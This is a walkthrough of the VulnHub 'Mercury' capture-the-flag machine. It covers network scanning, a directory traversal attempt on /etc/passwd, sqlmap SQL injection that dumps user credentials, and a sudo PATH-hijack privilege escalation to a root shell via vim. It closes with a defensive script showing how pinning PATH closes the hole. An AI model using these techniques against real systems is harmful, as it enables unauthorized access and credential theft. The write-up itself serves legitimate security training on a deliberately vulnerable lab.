The Planets: Mercury VulnHub CTF Walkthrough
Mercury is an intentionally vulnerable CTF machine which consists of two flags. The author of this machine is SirFlash and this machine belongs to the series called The Planets.
This machine can be downloaded from The Planets: Mercury - VulnHub.
After downloading and setting up, it’ll look like this:
Also don’t forget to set up both the attacker and victim machines on the same network.
Then we have to fetch the IP address of the victim machine. It’s easy to find the IP address when the victim machine is in the same network as ours. The command I used here is
sudo arp-scan -l
The victim IP address is 192.168.29.74
The next step is to do some recon on the IP address. We have to find open ports and services to collect more information. The tool I’m gonna use is Nmap and the command is
nmap -sV -Pn 192.168.29.74
Here, there are two open ports, 22 and 8080, which are SSH and HTTP respectively. So what I’m gonna do next is visit the IP address in the web browser.
Visiting the IP wasn’t really useful. So the next thing to do here is directory enumeration using the dirsearch tool. The command I used is
dirsearch -u http://192.168.29.74:8080/ -w /usr/share/wordlists/dirb/common.txt
We got a successful status code for robots.txt. So let’s try to fetch this file using the web browser.
This also wasn’t helpful either. So I tried some directory traversal attempts, such as
/../../../../etc/passwd
Finally I found that there’s a directory called mercuryfacts. Let’s visit that directory.
Now there are two links which might be helpful to us. So let’s visit them one by one.
First, I visited Mercury Facts: Load a fact.
From here, I thought there was a chance of more facts. So I tried visiting the fact pages in sequence. After fact page 9, there weren’t any more facts.
Secondly, I visited Website Todo List: Load a fact.
I thought I hit a dead-end here.
Then I realized that there’s a table named users in this website’s database. After listening to some music, I had a thought: “Why shouldn’t I try SQLi on the /mercuryfacts/1 page?” So I used the sqlmap tool to do SQLi. The command I used here is
sqlmap -u http://192.168.29.74:8080/mercuryfacts/1 --dbs
And the result was
Hooray! Found a database named mercury. Now let’s dump data from this database. For that I used
sqlmap -u http://192.168.29.74:8080/mercuryfacts/1 -D mercury --dump
and the output was
I hoped one of these username and password pairs might be the SSH login credentials. So I used these credentials to log in over SSH.
I have successfully logged in. I listed the files and I got a user_flag.txt.
One down, one to go.
Then I tried to access the /root directory and I couldn’t, because I didn’t have the privilege to access it. So I again listed the files and directories, and that’s when I noticed a directory named mercury_proj. I visited that directory and found a text file named notes.txt.
Inside the notes.txt file, I found some project account credentials. I’m currently logged in using the webmaster user’s credentials. So let’s switch to the linuxmaster user, and for that we have to decode this encoded text. The encoded text is in base64 format; Linux has tools to decode this, but in this case I used a website called Base64 Encode and Decode.
We got the password. So let’s switch to the linuxmaster account.
After switching, I tried to visit the root directory, but it wasn’t possible. So I have to find some technique to bypass this privilege issue. I checked which commands this user can run with sudo, and to list them, I used
sudo -l
The check_syslog.sh script could be running with a preserved environment, which means we can abuse the PATH environment variable. So to do that, let’s create a symlink named tail that points to the vim editor, and then change the PATH variable. For that I used the commands
ln -s /usr/bin/vim tail
export PATH=$(pwd):$PATH
sudo --preserve-env=PATH /usr/bin/check_syslog.sh
After hitting the Enter key for the last command, it’ll open the Vim editor like this. Here, we have to type
:!/bin/bash
and hit enter
Boom!!! We got root access. Hooray !!!
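The PATH abuse above works because the script resolves tail by its bare name while sudo keeps the caller's PATH. As an added example that is not from the walkthrough (the real check_syslog.sh is not shown, so the two check functions are an assumed reconstruction of it), here is that weakness beside a hardened form that resets PATH before any lookup, with a constructed fake tail to show the difference:

```shell
#!/bin/sh
# Added demo, not from the walkthrough. The two check functions are an ASSUMED
# reconstruction of what check_syslog.sh does (read a log with tail); the real
# script is not shown. It shows why a bare "tail" is unsafe when sudo keeps the
# caller's PATH, and that resetting PATH inside the script closes the hole.

# Unhardened: "tail" is resolved through whatever PATH the caller preserved.
vulnerable_syslog_check() {
    tail -n 1 "$1"
}

# Hardened: a subshell pins PATH to trusted directories before the lookup,
# so a directory the caller prepended is never searched.
hardened_syslog_check() {
    (
        PATH=/usr/bin:/bin
        export PATH
        tail -n 1 "$1"
    )
}

# Constructed hijack: a throwaway directory holding a fake "tail" that prints
# a marker instead of reading the file. Prints the directory path.
setup_fake_tail() {
    dir=$(mktemp -d)
    printf '#!/bin/sh\necho HIJACKED\n' > "$dir/tail"
    chmod +x "$dir/tail"
    printf '%s\n' "$dir"
}

# Runs the named check function on a constructed two-line log with the fake
# directory first on PATH, and prints whatever that function printed.
run_with_hijack() {
    fake=$(setup_fake_tail)
    log=$(mktemp)
    printf 'Jan 01 00:00:01 host sshd: first line\nJan 01 00:00:02 host sshd: last line\n' > "$log"
    out=$(PATH="$fake:$PATH"; export PATH; "$1" "$log")
    rm -rf "$fake" "$log"
    printf '%s\n' "$out"
}

echo "vulnerable: $(run_with_hijack vulnerable_syslog_check)"   # HIJACKED
echo "hardened:   $(run_with_hijack hardened_syslog_check)"     # Jan 01 00:00:02 host sshd: last line
```

The same fix applies to any script allowed in sudoers: pin PATH at the top and never rely on the caller's environment, which is exactly what --preserve-env=PATH hands over.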
The final steps are to list the files and read the root flag.
So it was easy. I think the privilege escalation was the only difficult part. Hope you guys enjoyed this walkthrough.